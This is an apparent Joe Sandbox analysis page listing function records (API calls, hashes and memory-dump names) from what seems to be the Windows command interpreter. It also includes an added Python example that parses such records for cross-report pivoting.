                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4291973834-0
                                                                                                                    • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                    • Instruction ID: fd36f15fa70688c71d3d237c448c6d7c2621358d1865a51b08f47448841d4206
                                                                                                                    • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                    • Instruction Fuzzy Hash: E641EA31A0864B82FB50BF14E848279BAB0FF84B87FA40435D90D47AA1EF7CE940C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    [Control-flow graph rendered as an image in the original report; graph text not reproduced. Function entry block: 7ff789bd4a14. Blocks reference the APIs GetEnvironmentStringsW, GetProcessHeap, RtlAllocateHeap, memmove and FreeEnvironmentStringsW.]
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A28
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A66
                                                                                                                    • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A7D
                                                                                                                    • memmove.MSVCRT(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A9A
                                                                                                                    • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4AA2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentHeapStrings$AllocateFreeProcessmemmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 647542462-0
                                                                                                                    • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                                                    • Instruction ID: 22b6ab8d10396b70089c8aa42b937a7d59a23d72c71fb2171ac516d91849c66a
                                                                                                                    • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                                                    • Instruction Fuzzy Hash: 42119122A1474A82EA50AF01A408039FFB1FB89FD1BA99038DE4E03784EE3DE441C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1826527819-0
                                                                                                                    • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                    • Instruction ID: 562cfe40114dfa559621950d2e94bbb69561535941de4195e46df5234c609949
                                                                                                                    • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                    • Instruction Fuzzy Hash: F5011E2190968ACAE7047F55A858179FE70FB8AF97FE45134E54F06396EF3C9044C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$FullNamePathwcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1464828906-0
                                                                                                                    • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                    • Instruction ID: 27f947337f6c6770e3a38acb9bed05b055e5ccdb58b107c6198c233ad4e4fe5f
                                                                                                                    • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                    • Instruction Fuzzy Hash: EB31F521A0865A82E724BF15A44817EFA71FB45FDAFE48234DA4E433D1EE7DE885C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset
                                                                                                                    • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                    • API String ID: 2221118986-3416068913
                                                                                                                    • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                    • Instruction ID: 56f4306ffe3eeef21e18e79876044f4c1efe6e873fa5226fe7c02e7276f555c6
                                                                                                                    • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                    • Instruction Fuzzy Hash: 61110A21A0874E80EB50EF11A558279AA70BF84FF5FB44631ED6D473D9DE2CD440C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memsetwcschr
                                                                                                                    • String ID: 2$COMSPEC
                                                                                                                    • API String ID: 1764819092-1738800741
                                                                                                                    • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                    • Instruction ID: dad3247484231f4620d27b32b7f05e5ad35f3121378a2ce9d7bcf6fd313c953c
                                                                                                                    • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                    • Instruction Fuzzy Hash: 52519321E0865B85FFA07F21945037DABB1BF84FAAFA44431DA0D867D5DE2CE940C761
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: wcschr$ErrorFileFindFirstLastwcsrchr
• String ID:
• API String ID: 4254246844-0
• Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
• Instruction ID: a74fc31d91888e8cbadc97295c7ad9770a56e1494522a9be2ba47df0147e3548
• Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
• Instruction Fuzzy Hash: BE419021A0878A86FA20AF11E458379EFB0FF85F86FA44534DA4D477C5EE3CE441C660
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Heap$EnvironmentFreeProcessVariable
• String ID:
• API String ID: 2643372051-0
• Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
• Instruction ID: 00d76cdc859d30b73c127b88145b515a93b8b4839fd22f50d03a1ba80f74955a
• Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
• Instruction Fuzzy Hash: 76F06761A1974A86E6406F76E444079EAB1FF59FA2BA59234C56D033D0DE3C9444C210
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: _get_osfhandle$ConsoleMode
• String ID:
• API String ID: 1591002910-0
• Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
• Instruction ID: 78907c7d7005bb37b19433dba7b26aabe8547539148495c338719ea27d304044
• Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
• Instruction Fuzzy Hash: 19F06734A09706CBE644AF21E845578FEB0FB89B52FA54138CA0A43350DF3EA405CB10
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: DriveType
• String ID: :
• API String ID: 338552980-336475711
• Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
• Instruction ID: 1384a2430a5d5666cb4e0709944789bbe6f1b12358afe202fbef5f12508874a6
• Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
• Instruction Fuzzy Hash: F9E06D6761864486E720AF60E46106AFBB0FB8DB49FD41525EA8D83724EB3CD249CB18
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF789BCCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDA6
  • Part of subcall function 00007FF789BCCD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDBD
• GetConsoleTitleW.KERNELBASE ref: 00007FF789BD5B52
  • Part of subcall function 00007FF789BD4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BD4297
  • Part of subcall function 00007FF789BD4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BD42D7
  • Part of subcall function 00007FF789BD4224: memset.MSVCRT ref: 00007FF789BD42FD
  • Part of subcall function 00007FF789BD4224: memset.MSVCRT ref: 00007FF789BD4368
  • Part of subcall function 00007FF789BD4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BD4380
  • Part of subcall function 00007FF789BD4224: wcsrchr.MSVCRT ref: 00007FF789BD43E6
  • Part of subcall function 00007FF789BD4224: lstrcmpW.KERNELBASE ref: 00007FF789BD4401
• GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF789BD5BC7
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocateInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
• String ID:
• API String ID: 346765439-0
• Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
• Instruction ID: 88530a8203dc92bb8fa77ee8670fb8708c2c0320cd1dc7d72425bbee2d386035
• Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
• Instruction Fuzzy Hash: 9531C720A1D64A46FA24FF11A4585BDEAB1FF89F81FE45431E94E47B85DE3CE402C720
Uniqueness
Uniqueness Score: -1.00%
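The function records above are what an analyst pivots on when hunting the same code across reports (Opcode ID, API ID) or when checking which Windows APIs a dumped function reaches, directly or through subcalls. As an added example that is not Joe Sandbox code, the following Python parser turns one such record into structured data; the record layout is taken from the text on this page, the sample input is the record immediately above (with most of its Associated lines dropped), and the reading of the dump file name's fourth field as the region start address is an assumption based on the names shown here.

```python
"""Added example (not Joe Sandbox code): parse the function-similarity records
printed in this report into structured data so an analyst can pivot on Opcode ID
across samples and list the APIs a function reaches directly or via subcalls."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: the record above, shortened; the Associated line keeps the
# "Download File" link text the page extraction fuses onto dump names.
SAMPLE_RECORD = """\
APIs
  • Part of subcall function 00007FF789BCCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDA6
  • Part of subcall function 00007FF789BCCD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDBD
• GetConsoleTitleW.KERNELBASE ref: 00007FF789BD5B52
  • Part of subcall function 00007FF789BD4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BD4297
  • Part of subcall function 00007FF789BD4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BD42D7
• GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF789BD5BC7
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocateInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
• String ID:
• API String ID: 346765439-0
• Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
• Instruction ID: 88530a8203dc92bb8fa77ee8670fb8708c2c0320cd1dc7d72425bbee2d386035
• Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
• Instruction Fuzzy Hash: 9531C720A1D64A46FA24FF11A4585BDEAB1FF89F81FE45431E94E47B85DE3CE402C720
Uniqueness
Uniqueness Score: -1.00%
"""

# One "APIs" bullet: optional "Part of subcall function <addr>: " prefix,
# "<Api>.<Module>", optional "(args)", then "ref: <call-site address>".
API_CALL = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>[\w:]+)\.(?P<module>[\w.-]+)(?:\((?P<args>[^)]*)\))?,?\s*ref: (?P<ref>[0-9A-Fa-f]+)$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                 # address of the call site
    subcall_of: int | None   # address of the intermediate function, if any

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)
    associated: list[str] = field(default_factory=list)

def parse_record(text: str) -> FunctionRecord:
    rec, section = FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):          # section header or bare "Key: value"
            key, sep, val = line.partition(":")
            if sep:
                rec.fields[key.strip()] = val.strip()
            else:
                section = line
            continue
        body = line.lstrip("•").strip()
        m = API_CALL.match(body) if section == "APIs" else None
        if m:
            rec.apis.append(ApiCall(m["api"], m["module"], int(m["ref"], 16),
                                    int(m["sub"], 16) if m["sub"] else None))
            continue
        key, _, val = body.partition(":")
        # Drop the "Download File" link text fused onto dump names by the page extraction.
        key, val = key.strip(), re.sub(r"Download File$", "", val).strip()
        if key == "Associated":
            rec.associated.append(val)
        elif key == "Source File":            # "<dump>, Offset: <base>, based on PE: <bool>"
            dump, _, rest = val.partition(", ")
            rec.fields["Source File"] = dump
            for part in rest.split(", "):
                k, _, v = part.partition(":")
                rec.fields[k.strip()] = v.strip()
        else:
            rec.fields[key] = val
    return rec

def region_start(rec: FunctionRecord) -> int:
    # Assumption: the dump name's fourth dot-separated field is the region start
    # address (it matches the Offset values shown on this page).
    return int(rec.fields["Source File"].split(".")[3], 16)

def direct_calls(rec: FunctionRecord) -> list[str]:
    """APIs the function itself calls, excluding those reached through subcalls."""
    return [c.api for c in rec.apis if c.subcall_of is None]
```

Run over every record in a report, `rec.fields["Opcode ID"]` is the value to match across analyses (on this page it is identical to the Opcode Fuzzy Hash in every record), and `region_start(rec) - int(rec.fields["Offset"], 16)` gives the dump region's offset from the image base, 0x1000 here, which is where the code section of this module begins.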

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Concurrency::cancel_current_taskmalloc
• String ID:
• API String ID: 1412018758-0
• Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
• Instruction ID: abb47e74f2deeaff718d3b7b7f253e0e815d4a66539a82631076387f0f22c46c
• Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
• Instruction Fuzzy Hash: 0FE0ED45F5A60F95FE183F6268491749A647F59F52FE81430DD1D46382EF2CA191C330
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDA6
• RtlAllocateHeap.NTDLL(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDBD
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
• Instruction ID: cfd8712d1361f5e66fae49d95ca13ded6b832166a271b548b27737b374a85609
• Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
• Instruction Fuzzy Hash: 23F01D31A1874686EA44AF15F844478FBB5FB89F42BA89434D90E03394DF3DE441C710
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
